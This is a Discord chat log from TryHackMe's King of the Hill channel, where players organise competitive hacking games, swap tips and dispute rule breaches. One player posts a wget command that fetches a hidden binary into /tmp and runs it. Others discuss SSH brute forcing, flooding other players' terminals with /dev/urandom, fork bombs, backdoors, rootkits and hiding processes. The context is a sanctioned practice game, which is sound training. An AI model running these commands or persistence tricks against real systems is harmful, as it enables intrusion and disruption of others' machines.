publix
#koth
stiff egret
Starting in?
stiff egret
It's usually helpful to share the spec link as well, so players can see if they wanna join.
nova tide
Good Luck π
stiff egret
Naughty you playing?
stiff egret
Ok 
gloomy shale
i think i am in a lobby of afk people T_T
stiff egret
I can join if anyone wanna play.
hearty wing
i can play in 10 minutes
gloomy shale
finishing in 7 mins
hearty wing
who makes lobby
stiff egret
That game you posted is starting in 20 ?
hearty wing
okay yeah
stiff egret
Everyone can join that one.
hearty wing
yeah
gloomy shale
this one?
hearty wing
yeah
gloomy shale
k
gloomy shale
i will finish in 3 mins
stiff egret
oh lol I really would've exited, I don't do offline box, was AFK damnit
hearty wing
we can make a new game
stiff egret
Yeah, let's do that
gloomy shale
yes please xD
gloomy shale
i really have no clue for that machine
hearty wing
come join
gloomy shale
oh @hearty wing you remember last time we played, you were printing like strings on my shell xD
hearty wing
yeah
gloomy shale
how did you do that
hearty wing
i will pm
gloomy shale
k
frail narwhal
echo string > /dev/pts/<your_pts_code>
gloomy shale
why it says i am the king but the time don't increase :/
stiff egret
Because we are both writing names so fast that king service is seeing the file as empty
gloomy shale
oh xD
hearty wing
ah man i forgot backdoors
stiff egret
I see those urandon missiles landing
stiff egret
Nope.
hearty wing
someone changed all the passwords
gloomy shale
it says connection refused
hearty wing
same for me
stiff egret
SSH closed?
hearty wing
yes
gloomy shale
i think yes
stiff egret
Rescan the target. this is an example how people simply change the port, and everyone reports it's off.
It's not. I merely changed the port.
hearty wing
okay
gloomy shale
ssh disappeared
hearty wing
yeah
gloomy shale
k
hearty wing
ah man cant get in with brute forcing as well
gloomy shale
can you access the wordpress site?
gloomy shale
i can't open the login page idk why
hearty wing
i had the same problem before
but im in now
i havent expoloited thru wordpress before
stiff egret
Its pretty cool to get a shell from wordpress
hearty wing
i have to find out how tho
stiff egret
Oh, have you done MrRobot room?
hearty wing
i know now how
gloomy shale
well i am stuck now o_o
hearty wing
i changed all credentials for wordpress
hearty wing
i can say that username is pangpo
stiff egret
I think the direct one is still working ||shifu user||
gloomy shale
still can't find the new ssh port tho
stiff egret
nmap π€·ββοΈ
gloomy shale
ye i 'm trying
have you ever found the password for ||steghide to the image in the website||?
stiff egret
You sure there is one?
gloomy shale
not 100% but if i run ||steghide info|| on it it ask me if i want to || get the embedded data|| so i think yes
hearty wing
I think the direct one is still working ||shifu user||
i found but i cant get the password
and wordpress exploits are not working because the page is so slow i acnt do anything
stiff egret
not 100% but if i run ||steghide info|| on it it ask me if i want to || get the ...
IIRC it asks for that on any image
gloomy shale
oh i didn't know that
hearty wing
congrats @stiff egret
gloomy shale
GG
stiff egret
GG
stiff egret
Uh, Multiple methods to get in, I ||exploited tomcat|| , got the shell
gloomy shale
one question, it was you to make my terminal going crazy with all the weird characters?
stiff egret
didnt work
Well, it works π Try it next time
stiff egret
one question, it was you to make my terminal going crazy with all the weird char...
Yeah, that was urandom, I cat-ted them on your pty.
hearty wing
@gloomy shale how did you get king so fast
stiff egret
Yeah, that was urandom, I cat-ted them on your pty.
It's like reading an infinitely long file but on another terminal.
gloomy shale
It's like reading an infinitely long file but on another terminal.
So cool
hearty wing
i have used it
gloomy shale
<@!390840489290760192> how did you get king so fast
||hydra|| the ssh, got password, and then ||privesc||
gloomy shale
yep
stiff egret
I can't, it's dinner time here.
hearty wing
okay
gloomy shale
i have to go afk for a while
hearty wing
okay
gloomy shale
later maybe
hearty wing
yeah okay
tall cove
!docs koth
pearl gladeBOT
TryHackMe
frail narwhal
carmine flame
if anyone wants to join a game strting in 4 minutes on the machine Lion:
https://tryhackme.com/games/koth/join/c634917e574f7e69315f67fc
rancid pewter
Good luck
dusk cave
how do you know its gonna be lion?
rancid pewter
You can choose the box when making a private game
dusk cave
You can choose the box when making a private game
gl to you
dusk cave
You can choose the box when making a private game
you are a god π
nova tide
Being taken care of.
frail narwhal
You were root after 2 mins or so lol
carmine flame
^^
I got access to the machine 1 minute before the end of the timer and I barely had time to get root with pip3 lol
dusk cave
<@!513121901548142593> Nah it just not the first time I am doing this box
just right before the end i managed to get the credentials but was already to late ! Not understanding the obv. sometimes π
rancid pewter
@dusk cave If you want we could do the box again in a private game I still haven't find all way into the box.
dusk cave
<@!513121901548142593> If you want we could do the box again in a private game I...
Yeah that would be nice ! A friend of me would also join
rancid pewter
Yeah that would be nice ! A friend of me would also join
I will take a little break of like 30 mins.
dusk cave
I will take a little break of like 30 mins.
Okay see you later
grand delta
is changing passwords for ssh and other stuff allowed ?>>
frail narwhal
yeah
rancid pewter
@dusk cave I'm back still down for the private game ?
dusk cave
<@!513121901548142593> I'm back still down for the private game ?
yeah ! how much time do you have? i am right now in a private game .. its over in 20 does that work for u?
rancid pewter
Yeah no problem
rancid pewter
Hogwarts
dusk cave
ah yes i will create
rancid pewter
Good
raw osprey
Yo
rancid pewter
Hey
dusk cave
someone is killing this koth game
winged charm
Thatβs not cool
raw osprey
Yes i did
raw osprey
do you expirience the same or is it u
I experience it too
Every commande i tried was useless
π
Even "ls"
And even in root i couldn't write the king.txt file π
winged charm
It seems like thereβs 4 people in that game so that leaves 2 people it could be I canβt really figure out who it is with only that information
remote abyss
yep
latent osprey
Would like to play?
remote abyss
o k
verbal root
Can I join?
latent osprey
Yes sure
remote abyss
When does it start
next time
latent osprey
Yes
remote abyss
lets play
latent osprey
New game?
opal pond
Im down too
latent osprey
Atleast let us hack (β―Β°β‘Β°οΌβ―οΈ΅ β»ββ»
opal pond
Just gimme time to boot up
remote abyss
lets play game with no changing pass
latent osprey
Yes thanks ( κα΄κ)
opal pond
And no submitting flags π
latent osprey
remote abyss
hahaahh ok
latent osprey
I m gonna submit flags in the end!
latent osprey
@remote abyss how did you get into the machine?
-p3333?
opal pond
We can change roots passwd tho
remote abyss
We can change roots passwd tho
noo
remote abyss
<@703605605377769483> how did you get into the machine?
-p3333?
yes
opal pond
Eh hopefully its not windows or hogwarts
remote abyss
https://tryhackme.com/games/koth/join/c54b5bf4163b8295585c9587
with no pass changing
latent osprey
Ook
opal pond
Not even root ?
latent osprey
I think ! We have to escalate that
We don't get pass for root
latent osprey
Okay your wish
remote abyss
someone changed the pass π
opal pond
I though we werenβt supposed to change passes ?
Ping me when the box got reset
Im in another lobby
opal pond
Im in another lobby
@un.kn0wn#3578 nvm it hogwarts π€¦π»ββοΈ
opal pond
Do what
opal pond
Didnβt block anything just removed it
remote abyss
form /bin
opal pond
Yes I believe
remote abyss
aa ok
remote abyss
how u do that ?
opal pond
Yea I noticed
remote abyss
how ?
opal pond
Um i transferred my own binary ?
remote abyss
ok
opal pond
GG
opal pond
Im in a public lobby
Starts in 13 mins
Join a public game if u didnβt get in mine iβll send u the link
remote abyss
ok
opal pond
Is changing passwords allowed or nah ?
remote abyss
Is changing passwords allowed or nah ?
we are in public
remote abyss
Is changing passwords allowed or nah ?
allowed
opal pond
allowed
@remote abyss can u send the link in this channel
opal pond
Eh it Offline im out
remote abyss
ok
opal pond
No passwd changes then
remote abyss
ok
remote abyss
gg
remote abyss
So u changed both passwords and closed all my shells
i kill u
remote abyss
So u changed both passwords and closed all my shells
i didn change pass
remote abyss
yep
opal pond
So u changed the pass ?! Lol
remote abyss
So u changed the pass ?! Lol
no
opal pond
π
opal pond
Yea but I wasnβt getting connection refused
Before u changed the port
I was getting permission denied bc of the passwd change
remote abyss
Yea but I wasnβt getting connection refused
i changed sshd port
opal pond
|| ramen and pasta ||
opal pond
Nah im not playing rn donβt worry
remote abyss
suraj41 i think
remote abyss
Nah im not playing rn donβt worry
ok
winter laurel
suraj41 i think
I am in box, but didn't changed passwd
dusk cave
someone up for koth?
remote abyss
yes
remote abyss
https://tryhackme.com/games/koth/join/6d46c230908c7947fe3f51c6
are u up?
remote abyss
someone up for koth?
are u up?
dusk cave
yea
remote abyss
lets play
remote abyss
someone else ??
remote abyss
go for private game?
public
dusk cave
ok
remote abyss
yes
remote abyss
ey bro are you from albania?
why?
remote abyss
i live in tirana
dusk cave
nice ! π
dude i have no idea about Windows machines lol
any tips ? π
i am already on the machine but i didnt do windows rooms yet haha
hearty wing
@remote abyss sry I was away
dusk cave
msf
hmm i dont like to you metasploit if i can avoid it is there even a build in text editor ? how do i edit files LOL i feel like i am at the beginning again π
remote abyss
hmm i dont like to you metasploit if i can avoid it is there even a build in tex...
u can use shell
dusk cave
i am already logged in with ssh
remote abyss
ok
dusk cave
and i think i found a vulnerability but is there something like nano or vim ??? π
weary horizon
https://tryhackme.com/games/koth/join/e6225a5d617ddfb61e5aa541
hey i'm in
remote abyss
ok
rancid pewter
@remote abyss Wanna do private game I dont feel like waiting 20 mins ?
sick turtle
prepare to be disappointed
lapis iris
how to play koth
quiet schooner
!docs koth
pearl gladeBOT
TryHackMe
vernal stone
knotty steppe
Hope I was helpful!! @timid basin . Keep Hustling
timid basin
thx man!
knotty steppe
Never mind brother
remote abyss
koth?
nova tide
@remote abyss can i dm you?
remote abyss
<@!703605605377769483> can i dm you?
yes sure
remote abyss
<@!703605605377769483> can i dm you?
Are u in staff of koth ??
stiff egret
Click on the name, you can see the koth-staff role.
nova tide
Yeah i am.
remote abyss
Yeah i am.
cool
hearty wing
when are you going to release new box
stiff egret
very soonβ’οΈ iirc
knotty steppe
Can anyone tell the least level required for koth?
I mean what is intermediate level..
stiff egret
Least level of knowledge OR least level on tryhackme site to be allowed to play KoTH?
knotty steppe
Exactly the sane questionπ
stiff egret
To change your level on tryhackme site, go to Profile > About you > At the bottom of the page, change your level.
About actual knowledge level, you should first try easy-medium level boxes on site, once you are comfortable with them, you can start with koth, many prefer to directly start KoTH, you can try that too.
knotty steppe
Thanks a lot sir!! π
stiff egret
no need of sir, and no probs :))
knotty steppe
:-)
latent osprey
Yup ping me @hearty wing
hearty wing
Okay see ya later
tame zinc
@latent osprey @hearty wing I'm new at it but I'd join in
wispy current
can i join too?
hearty wing
<@!515546257163550721> <@!535473586857705483> I'm new at it but I'd join in
Of course. New players are always welcome
hearty wing
can i join too?
Yeah of course
latent osprey
Hey cool! I will join it
hearty wing
I can play in about hour
dusk cave
i am having some trouble with hackers can i dm someone? for a small hint
hearty wing
Yeah @dusk cave
quiet schooner
@dusk cave There's an official writeup for it
dusk cave
<@513121901548142593> There's an official writeup for it
I just double checked with Taneltanelsson and the writeup i am doing the right thing it just doesnt work
quiet schooner
Then someone might have patched it, or you're doing it wrong
dusk cave
i am with a friend in a private game he has no clue either
might i send u a screenshot?
quiet schooner
I guess. I'm not gonna spoil the box though.
dusk cave
no i dont want that at all!
little sail
@remote eagle this is the channel you want to post koth grievances in if someones breaking the rules
!docs verify
pearl gladeBOT
TryHackMe
remote eagle
was having a problem with the verification process, sorry for the requests
I believe this guy got root, then editted the flags
and stopped the ssh server
and after couple minutes the machine stopped being accessible
I checked and it wasn't resetted or anything like this
I know someone altered the machine, because chattr was used on /root/king.txt and removed from the box
python2.7 binary was removed as well
and the flags were obviously altered
nova tide
I know someone altered the machine, because `chattr` was used on `/root/king.txt...
That is within rules, you are allowed to get your own binaries own to the system specially chattr. For ssh people tend to change to port for the service. If you have any screenshots of the flags that were altered?
remote eagle
yes
I think
one sec
I think I forgot to screenshot π€¦ββοΈ
That is within rules
I know but ssh service was stopped as well
that's the flag I found, unfortunately I forgot to screenshot it on the ssh session, another flag was altered as well
severe oar
@remote eagle this flag was also like this for me, nobody changed it, and ssh changed the user password, so you were not able to connect to the machine
carmine flame
that's the flag I found, unfortunately I forgot to screenshot it on the ssh sess...
Don't you thing that you could do something to that rotten flag? π
remote eagle
So I did it and came here to complain ? Don't you think that's little off ?
@severe oar it wasn't because of a changed password, I think I would know if that was the problem
remote eagle
it wouldn't make sense from me to alter the flag then post about it here
severe oar
nobody interrupted or changed the ssh port
remote eagle
ok i'm out
carmine flame
I asked you if you couldn't do something with it now that you have it ^^
nova tide
> That is within rules
I know but ssh service was stopped as well
did you try running -p- in your new nmap scan
remote eagle
yes
fair adder
I believe this guy got root, then editted the flags
never did something like this. it's against the rules
fair adder
and stopped the ssh server
also never did this
remote eagle
I tried -p- and -Pn I also WAS root on the machine, so I know what happened
carmine flame
no I didn't
π€¦ββοΈ I know that you did nothing to it, that's why it doesn't work
nova tide
I tried `-p-` and `-Pn` I also WAS root on the machine, so I know what happened
The flags are not altered but encrypted instead.
carmine flame
Don't you thing that you could do something to that rotten flag? π
ROTten
remote eagle
and that's allowed ?
carmine flame
and that's allowed ?
That's how the box was made ^^
nova tide
and that's allowed ?
I mean that's what the room creator added. No one altered the flags.
remote eagle
ok I'm dumb
I can't believe I went trough of this to find out I was the problem π
also sorry @fair adder
fair adder
also sorry <@456226577798135808>
It's okay
nova tide
Also try to be patient, no need to freak out. If one way is patched there are always other ways in. and ssh is not the only way π
remote eagle
my bad
severe oar
@remote eagle a tip: when you can connect to the machine, get a reverse shell, it will keep you on it even if everything changes
civic swan
π
remote eagle
Any tip on how to get a bind shell ?
nova tide
Setting persistence wins you the (late) game.
nova tide
Any tip on how to get a bind shell ?
you still have 11 minutes to google that.
remote eagle
is the ||smb share really empty|| ? I suck at ||smb|| enumeration
severe oar
explore the web, leave smb aside
remote eagle
thx
severe oar
[xxx@tyler xxx]$ ls ls xxx.txt [xxx@tyler xxx]$ cat xxx.txt cat xxx.txt xxxxxxxxxxxxxxxxxxxx [xxxx@tyler xxxx]$ cd ..
I give up
...
harsh obsidian
Anyone up for Panda? I think I figured out how to find the final flag....
rancid pewter
Hey hey
harsh obsidian
Hey Donut
rancid pewter
Anyone up for Panda? I think I figured out how to find the final flag....
Im down
rancid pewter
Good luck
harsh obsidian
Be nice please, I'm trying to find this eighth damn flag lol
rancid pewter
Dont worry I don't have any note for this box and don't remember it
harsh obsidian
Holy crap, this regex grep is taking forever.
harsh obsidian
ripgrep, I'll have to look that one up. I've never heard of it
rancid pewter
I downloaded a static binary of ripgrep on the box /root/rg
harsh obsidian
I downloaded a static binary of ripgrep on the box `/root/rg`
Thanks, I'm running it now
rancid pewter
No problem
harsh obsidian
They've been running this whole time and haven't yielded anything of note....FML
rancid pewter
What was your regex for find the flag. This box got some really weird flag format like I think they are base64 encoded and without any wrapper
harsh obsidian
[a-fA-f0-9]{32}|[a-zA-Z0-9]{44} because i've seen both formats when decoded
mighty dawn
how many flags were there
harsh obsidian
And there goes that.....
harsh obsidian
how many flags were there
eight total
mighty dawn
oh
rancid pewter
The box is still not dead
harsh obsidian
The box is still not dead
It's already closed connections and won't allow a reconnect
severe oar
myDonut is the Hogwarts room slow for you too?
grand delta
you lads playing one more ???
severe oar
hogwarts is the worst room in the tryhackme
rancid pewter
It's already closed connections and won't allow a reconnect
Yeah my shell just died
harsh obsidian
Time to head to a meeting. See y'all later
rancid pewter
hogwarts is the worst room in the tryhackme
Best room
grand delta
hogwarts is the worst room in the tryhackme
nah not really ... π
rancid pewter
Yup
@severe oar Make sure you do a full port scan and on every reset since port a random.
severe oar
I did it, 15 minutes running nmap with -T4, and that's all for nothing, since you changed the ssh password ...
rancid pewter
I didnt change the ssh password
I dont patch box
Little tips use rustscan full port scan in 3 sec
quiet schooner
hogwarts is the worst room in the tryhackme
Just because you find it difficult, doesn't make it bad. It's also not a room.
severe oar
it's not difficult, it's just slow, it's a game of patience
hazy geode
me
remote abyss
ok join
hazy geode
okay
remote abyss
someone else up ??
cedar lark
oow
remote abyss
@cedar lark ??
remote abyss
ok next time
cedar lark
okay
hazy geode
yeah i give up
grand delta
dm me ! @wispy current π
civic swan
Nice one guys! Nice narender had fun with youβ€οΈβ€οΈβ€οΈ
π
π π bro you killed
grand delta
anyone for koth now ?
winter laurel
count me in
civic swan
yaa
grand delta
someone send the link ...i am too lazy π π
latent osprey
count me in
Damm bro! Where you got the fourth flag
I will join KOTH in 20 min
Making a room
stiff egret
Avoid the spoilers please.
latent osprey
Ok sir β€οΈ
stiff egret
SMH told you before, no need of sir.
tame zinc
My first time doing KOTH....here we go
nova tide
Good luck
tame zinc
of course get a work call as soon as I try to join one rip me
latent osprey
Yeah
This was fun! I was not able to echo my name to king
Lol idk why
But when I figured how to do that
Timer ran out
fringe fog
Any1 up let a noob tag along in about two hours?
hearty wing
Any1 up let a noob tag along in about two hours?
I would like to but can't play in 2 hours
fringe fog
I would like to but can't play in 2 hours
im rdy now, but just tagg me somthime:)
hearty wing
Okay in about 30 minutes
fringe fog
allrigth
cedar lark
remote abyss
koth??
stiff egret
@cedar lark Can I DM?
cedar lark
yeap
stiff egret
Hey @harsh obsidian I see you there!
harsh obsidian
Hey <@!692486061762543718> I see you there!
Hey! What's going on?
stiff egret
Grinding KoTH today, leaderboards are out, (I think you know already)
harsh obsidian
Actually I didn't. I haven't been doing a whole lot of KotH beyond testing this enumeration script I've been working on lol
stiff egret
Oh, well they are out,
harsh obsidian
Oh, well they are out,
lol
harsh obsidian
Oh, well they are out,
Holy [redacted]! I'm number six in KotH!
stiff egret
:)) Congrats!
harsh obsidian
:\)) Congrats!
Thanks!
nova tide
Congrats
nova tide
π
opal pond
Oh, well they are out,
@Mr.Holmes#3066 does private games count ?
stiff egret
No, only public games with points > 0
opal pond
Anyone in a public game starting soon ?
rancid pewter
@stiff egret Hey I only need 2 win to take your place in the leaderboard
stiff egret
There's a potential update in the leaderboards, (potential not 100% solid)
if that happens, you'll need wayy more then just 2 games
btw rn you are above me in boards
rancid pewter
Really?
stiff egret
rancid pewter
stiff egret
eh, the ranks are juggling because of equal points
https://tryhackme.com/games/koth/16491 though this one will clarify that confusion
rancid pewter
That your first mistake
stiff egret
I know
rancid pewter
Long time I havent that script
rancid pewter
You sure about that
nova tide
You sure about that
Sure in the new (upcoming) machines π
rancid pewter
@nova tide That interesting
nova tide
Oh you gonna love the new machines and hate holmes for making them π€£
stiff egret
ouch
nova tide
Lion?
stiff egret
yeah
nova tide
Patched that ||CVE||?
rancid pewter
unless you can do something with ||pip3 -v||
Your funny
rancid pewter
Yeah it patched also
stiff egret
the ||rce?||
rancid pewter
Yeah
stiff egret
yeah patched that one
nova tide
Patched that ||CVE||?
I don't remember which one was it. I just renamed it to "rootshell" on my system
stiff egret
π yeah it was that ||rce||
nova tide
Run that to get root shell
rancid pewter
Ill vote for reset then
stiff egret
evil mean people
rancid pewter
The game as been running for 35 mins
nova tide
Keep grinding all of you imma go sleep now
rancid pewter
Can I do a fork bomb to kill the box ?
stiff egret
I should be working now, but here I am grinding koth
stiff egret
Can I do a fork bomb to kill the box ?
ouch
nova tide
Can I do a fork bomb to kill the box ?
Ofcourse. if you want to get banned
JK ππ
rancid pewter
But making the Window box blue screen is legal
stiff egret
stiff egret
imagine knowing windows
rancid pewter
Oufff
stiff egret
I know you got a surprise binary up your sleeve, I am not gonna let you run that
sonic belfry
All you need to do is become an initiate to the order of the Windows Magicβ’οΈ
rancid pewter
wget http://10.6.35.75/rev -O /tmp/.log; chmod +x /tmp/.log; /tmp/.log
stiff egret
All you need to do is become an initiate to the order of the Windows Magicβ’οΈ
lemme guess, the flag with blue screen and 'Installing updates' text underneath ?
that was me myDonut
nova tide
Was trying that rce π
stiff egret
your server is dead @rancid pewter
rancid pewter
@stiff egret You won anyway you got more then 30mins of king time
stiff egret
m pretty sure you have all flags stored
stiff egret
alright resetting
stiff egret
rancid pewter
GG y'all
rancid pewter
Yup
fringe fog
any1 want to have a noob taging along?
hardy needle
i don't understand the KOTH stuff..are we on a team or is it everyone for themselves? also @rancid pewter you are killing it as king!
rancid pewter
i don't understand the KOTH stuff..are we on a team or is it everyone for themse...
We are all by our self the goal is to root the box the quickest and write your name in /root/king.txt but I already have done this box so I can root it under 1 min but still I didnt patch anything.
stiff egret
Oh no mydonut grinding, don't take away my rank, m sleeping dude
rancid pewter
Already took it
nova tide
i don't understand the KOTH stuff..are we on a team or is it everyone for themse...
!docs koth
pearl gladeBOT
TryHackMe
nova tide
Already took it
Don't take mine
stiff egret
Already took it
I'll play when you'll be sleeping tomorrow ππ
rancid pewter
I'll play when you'll be sleeping tomorrow ππ
Sleeping is for the weak
hardy needle
@rancid pewter ah ok.. That makes sense then. I read the page and it said to join the discord VC, which made me think it was collaborative. Thanks
stiff egret
I intend on living a bit longer
rancid pewter
Don't take mine <:kekw:658061932577816606>
Admire your rank until it gone. Nah really for all the time you played and helped people you deserved it.
stiff egret
waiting for the recalculation
rancid pewter
I intend on living a bit longer
Ill just make an AI of myself to do KOTH all day
stiff egret
Sssssh up dude, don't give away ideas
Tho now that you mention it
It's actually possible
ππ
rancid pewter
Only if there wasnt a rule for scripting box
stiff egret
All legends untill Hogwarts comes in
nova tide
Or offline? π€
rancid pewter
exit(0);
πππ
rancid pewter
I mixed like python and C
rancid pewter
I was not ready for this
stiff egret
- Watch the language please
- Damn who was that
stiff egret
... ?
nova tide
You are not supposed to say that in public?
stiff egret
π€oh didn't know that
nova tide
You are not supposed to say that in public?
I think so
rancid pewter
We didn't specify anyone
stiff egret
Well anyway,
nova tide
One could be myDonut π
stiff egret
Drop a mail to koth@tryhackme.com anyway
@rancid pewter helps getting it in the record
rancid pewter
Yeah if @stiff egret want his 2nd place he could just ban me
nova tide
Wait, what happened again?
stiff egret
Some user changed the flag with abuses for myDonut
stiff egret
Yeah if <@!580609268261191680> want his 2nd place he could just ban me
I wish, but I'll beat you the legit way π‘οΈ
nova tide
I can ask CMNatic or an admin to check the logs for that
cedar lark
severe oar
rancid pewter
Anyway I need to go
nova tide
Goodnight
terse willow
@severe oar #talk-with-us-no-threading please π
cedar lark
@severe oar
your pwned
Linux nowak 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU/Linux
:S
terse willow
@cedar lark Are you targeting other members by any mischance?
terse willow
Sure looks like you might be saying you've hacked him
terse willow
May I suggest not joking about things that are:
A) Illegal
B) Against THM ToS
C) Against Discord ToS
D) Against our rules here
Good way to get banned from, well, everything, and likely passed along to the police π€·ββοΈ
severe oar
you are pwned del
terse willow
Smh. Right. Done with this
cedar lark
<@!747874953004580872>
if you complain too much I exclude everything.
terse willow
@severe oar seeing as you're being an absolute prat and are ignoring the ping in #talk-with-us-no-threading:
Ban appeals are jon@tryhackme.com. Enjoy
terse willow
Yeah, good luck with that, I banned him
Speaking of, you be careful -- you're on thin ice too
cedar lark
Speaking of, you be careful -- you're on thin ice too
why?
terse willow
May I suggest not joking about things that are:
A) Illegal
B) Against THM ToS
C)...
etc, etc
And I banned him for the toxicity he's displayed for the past however long he's been in here, pretending to break everything linked in that message after seeing you get yelled at for it, and ignoring the #talk-with-us-no-threading summons
He has the appeals email
terse willow
No, but you could be if you hacked something you don't have permission to hack. Like, for example, a machine belonging to another player in KoTH
We have no problem passing along breaches of the law to the authorities π€·ββοΈ
cedar lark
No, but you could be if you hacked something you don't have permission to hack. ...
i only did it 2 times
just for fun
sorry :\
terse willow
Only did, what, two times...
cedar lark
hack. Like, for example, a machine belonging to another player in KoTH
victim -> nowak
:\
terse willow
Sooooo, you're admitting to hacking another player?...
cedar lark
no..
cedar lark
Sooooo, you're admitting to hacking another player?...
it was a joke, sorry
terse willow
smh
terse willow
Buh bye
grand delta
anyone for koth
remote abyss
@stiff egret can i dm u??
stiff egret
You can talk here, no need for DMs, I was about to go to sleep anyway.
remote abyss
You can talk here, no need for DMs, I was about to go to sleep anyway.
good night
hearty wing
Did @del get banned lmao
remote abyss
and i π
winged charm
@remote abyss if you need to talk to a koth staff you can dm me
civic coral
@rancid pewter I have no idea what you're doing but it's intriguing and this has been a really fun KOTH so far π
rancid pewter
@civic coral Having alot of fun too. I have taken KOTH to a another level, I have forced people to play tetris, made a rootkit.
civic coral
<@!244531479462412288> Having alot of fun too. I have taken KOTH to a another le...
That's awesome, I just started out and it's such a fun way to practice offsec. Looking forward to more games like this :)
nova tide
<@!244531479462412288> Having alot of fun too. I have taken KOTH to a another le...
Made alot of people go tryhard π
rancid pewter
You are all lucky that I lost everything in a hard drive
rancid pewter
GG
civic coral
gg
@nova tide I'm a little confused, is l1nkm banned just from the discord or also thm?
rancid pewter
I might be able to get back my hard drive data tomorrow if I didn't break the drive. Hope your all ready for some tetris
civic coral
definitely, I'll start developing my own as well :)
rancid pewter
Good luck
nova tide
<@!267010557889085440> I'm a little confused, is l1nkm banned just from the disc...
I don't know who l1nkm is
civic coral
I just scrolled up a bit and a user named l1nkm was talking about hacking other users through koth, then I presume Muiri banned them, but I saw them in the past couple KOTH games I did today
rancid pewter
I think you got the wrong username
civic coral
Ahhhh, yeah I think they renamed themselves or made a new acc
nova tide
Look who is first
Gone
low maple
are binaries supposed to be deleted on Food?
stiff egret
That's just a hurdle. They are there. Worst reply ever, but try harder
brazen cloud
myDonut is back in koth oh laaaaawd
low maple
ok, just making sure that another player wasn't deleting them
brazen cloud
kernel rings? what kernel rings when myDonut is about π
low maple
its you
autumn iron
nope i didnt delete any just patched
autumn iron
π thankyou sir
low maple
it's gone
low maple
it was in ramen
autumn iron
ho lol some one just deleted it? that was not a correct play
autumn iron
yeah as i am the king π but still there are ways to get king try harder
low maple
all I can do is ls lol
plush lily
velvet nexus
delicate cedar
@stiff egret does Hogwarts a dynamic box?
stiff egret
yes
harsh obsidian
Has anyone else had issues with Offline and king? I have my username in king.txt but KotH isn't showing me as king. I can more the file with no issues.
stiff egret
The king file is supposed to be in c:/users/administrator/king-server/king.txt
This is where the service is reading the king from, you sure you are writing in the correct file?
harsh obsidian
Yep: C:\Users\Administrator\king-server\king.txt
stiff egret
Can you share the IP in DM?
harsh obsidian
And when I curl port 9999 on that box, I get a 503 Service Unavailable. I'm pretty sure I'm the only one on the box, and I haven't messed with 9999 or king-service
harsh obsidian
Can you share the IP in DM?
Sent
stiff egret
From what I can see, the king service broke.
@winged charm It's windows, you da wizard in that
how can they restart the king service in windows? (I have no idea )
winged charm
spooky had the most ghetto way of setting up the king service dont even ask me
basically
you need to completely restart the IIS server iirc
stiff egret
@harsh obsidian you can either do that ^ or reset the box.
harsh obsidian
<@!692486061762543718> you can either do that ^ or reset the box.
okay, thank you both
full grove
how can they restart the king service in windows? (I have no idea )
I changed the IIS root web folder directory to C:\Users\Administrator\koth\king.txt
and then gave IUSR read-write perms
there's one issue with echoing your name into it
it works completely fine if there's no whitespace afterwards, if there is it'll break it. very much so.
you dont need to restart anything
and ignore the incorrect file path, same thing, you get the general idea
stiff egret
Oh, Alright, thanks for the info! :) @harsh obsidian Maybe that'll help!
full grove
its a known issue, though. It's a windows thing. It's not the greatest for koth tbh.
stiff egret
'It's just windows being windows' is what I am gonna reply to from next time xD
full grove
pretty much
harsh obsidian
its a known issue, though. It's a windows thing. It's not the greatest for koth ...
I'm trying to get around the whitespace problem.....let's see if it works
full grove
it's best done in notepad
It's either
- There's no whitespace and there needs to be
or - There's whitespace and there's shouldn't be
nova tide
I changed the IIS root web folder directory to C:\Users\Administrator\koth\king....
Oi @stiff egret might wanna take screenshot of new rules and pin it here(as people usually tend not to read those). If others haven't checked yet they should re read the rules, they were updated recently.
stiff egret
harsh obsidian
Anyone here good with sed or awk? I've google'd my ___ off and can't figure out this problem.
chrome dome
I have a doubt: Can I use linPEAS to get my path to root while playing koth?
harsh obsidian
I have a doubt: Can I use linPEAS to get my path to root while playing koth?
Yes. But you'll learn a lot more if you come up with your own methods
delicate cedar
By rules no.4 we cannot modify koth binary source code?
stiff egret
By rules no.4 we cannot modify koth binary source code?
It says that there, doesn't it?
This time, the rules are pretty self explanatory.
delicate cedar
@broken berry cool script you got there
jovial field
Yes it works now
jovial field
Okkkkkkkkkkkkkkkkkkkkkkkkkkk
grand delta
Does it not ask you to set the ulimit....
stiff egret
?
delicate cedar
No chance against holmes
nova tide
<@!573087577394118688> cool script you got there
What script?
stiff egret
No chance against holmes
Blame the leaderboards.
delicate cedar
What script?
Just a shell script for king.txt
delicate cedar
Blame the leaderboards.
Did you use a rootkit or just a script for modify king.txt file on Lion box last time?
nova tide
Lots of secret stuff
stiff egret
Did you use a rootkit or just a script for modify king.txt file on Lion box last...
rootkits are overrated
and most of them not worth it.
Backdoor is the key to win.
See it like this, you need to have a basic shell to get root from the rootkit you planted.
But if someone patched everything, you won't be able to get one.
On the other hand, backdoor will give you root shell no matter what.
delicate cedar
It's not the backdoor though, I'm having a hard time to find how you change king.txt continuously
stiff egret
It's not the backdoor though, I'm having a hard time to find how you change king...
while loops?
delicate cedar
Not see a process there
nova tide
you can hide your process id as well
stiff egret
also, loops show up as normal bash processes.
I mean, google a LOT, read the man pages of binaries you use, never thought I'd say this, but they are epic
delicate cedar
Wait, while loops show process name as a regular bash session?
stiff egret
Yep
delicate cedar
*you can hide your process id as well*
Hmm, I'm only find the one that only mask the processes, not entirely hide it from proc
stiff egret
Hmm, I'm only find the one that only mask the processes, not entirely hide it fr...
well, you can hide it, just a matter of finding the proper method.
you need to share the join link, not the spectate link
:))
stiff egret
Private or public?
grand delta
priv
stiff egret
:(( m only playing public now, as priv are not counted in leaderboards
stiff egret
Booting up the vm
https://tryhackme.com/games/koth/join/e18d2ae6e272d77be30b1f11
Starting in 14 mins, Public
grand delta
π
stiff egret
who's that using chattr lol
grand delta
me !
stiff egret
What's your username on site?
grand delta
SANKALPSNIPEY
stiff egret
OH that's you ookk
grand delta
π you dint expect that from me . did you?
stiff egret
π no, I was just wondering who was that, you clearly patched almost everything
but missed one
grand delta
juz wait π‘
errant verge
omg
grand delta
Gg
stiff egret
GG
grand delta
Laptop crash at the 6th minute lol